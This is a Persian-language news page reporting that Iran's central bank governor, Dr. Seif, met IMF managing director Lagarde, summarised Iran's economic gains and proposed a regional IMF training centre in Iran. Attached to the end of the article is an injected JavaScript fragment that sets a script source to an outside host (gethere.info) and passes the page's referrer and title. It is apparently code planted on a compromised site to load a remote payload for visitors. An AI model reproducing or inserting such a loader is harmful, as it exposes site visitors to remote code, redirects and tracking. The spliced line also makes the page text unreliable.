چهارشنبه , 26 مهر 1396
خانه / اخبار بانکی / پیشنهاد دکتر سیف به ایجاد مرکز آموزش منطقه ای صندوق بین المللی پول در ایران

پیشنهاد دکتر سیف به ایجاد مرکز آموزش منطقه ای صندوق بین المللی پول در ایران

رییس کل بانک مرکزی در آخرین روز سفر خود به آمریکا جهت شرکت در اجلاس بهاره صندوق بین المللی پول و بانک جهانی باخانم لاگارد مدیرعامل صندوق بین المللی پول ملاقات کرد. در این جلسه رئیس کل بانک مرکزی توضیحاتی در مورد دستاوردهای اقتصادی منجمله خروج از رکود تورمی وافزایش رشد اقتصادی ، کاهش نرخ تورم و آرامش و ثبات در اقتصاد طی یک سال اخیر را ارائه کرد و این امر را نتیجه اعمال سیاست های درست ، هماهنگی بین اعضای هیئت دولت و حمایت های رییس جمهور عنوان کرد.، ایشان در ادامه اظهار داشت که در حال حاضر آرامش به بازار ارز بازگشته و انتظارات مثبت نسبت به آینده تقویت شده است . باتوجه به کاهش قیمت نفت، دولت بودجه سال جاری را با فرض ادامه وضع موجود و به صورت محتاطانه انتخاب کرده است و پیش بینی می شود رشد اقتصادی بدست آمده در سال گذشته در سال جاری نیز تکرار شود. در صورت دستیابی به توافق با کشورهای 1+5 نیز تحقق اهداف اقتصادی تسریع خواهد شد. در عین حال پیش بینی می شود با توجه به ظرفیت های فراوان اقتصادی در ایران مسلما حصول توافق و لغو تحریم ها می تواند تاثیرات مهمی در شرایط اقتصادی و توسعه همکاری باکشورهای منطقه داشته باشد. البته رابطه تجاری با برخی از کشورها از قبل وجود داشته و این روابط توسعه خواهد یافت. در زمینه میزان تولید و صادرات نفت، رئیس کل بانک مرکزی اظهار داشت با توجه به عضویت ایران در سازمان اپک تلاش بر توسعه همکاری با اعضا و رعایت سهمیه های تعیین شده خواهد بود .
خانم لاگارد نیز ضمن اعلام حمایت صندوق بین المللی پول از دستاوردهای بدست آمده، آمادگی آن نهاد را برای ارائه هر گونه کمک فنی مورد نیاز در زمینه مسائل اقتصادی و مالی اعلام کرد.
آقای دکتر سیف همچنین در پایان موضوع پیشنهاد ایجاد مرکز آموزش منطقه ای صندوق بین المللی پول در ایران را مطرح کردند که قرار شد موضوع مورد بررسی قرار گیرد.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

پاسخ دهید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *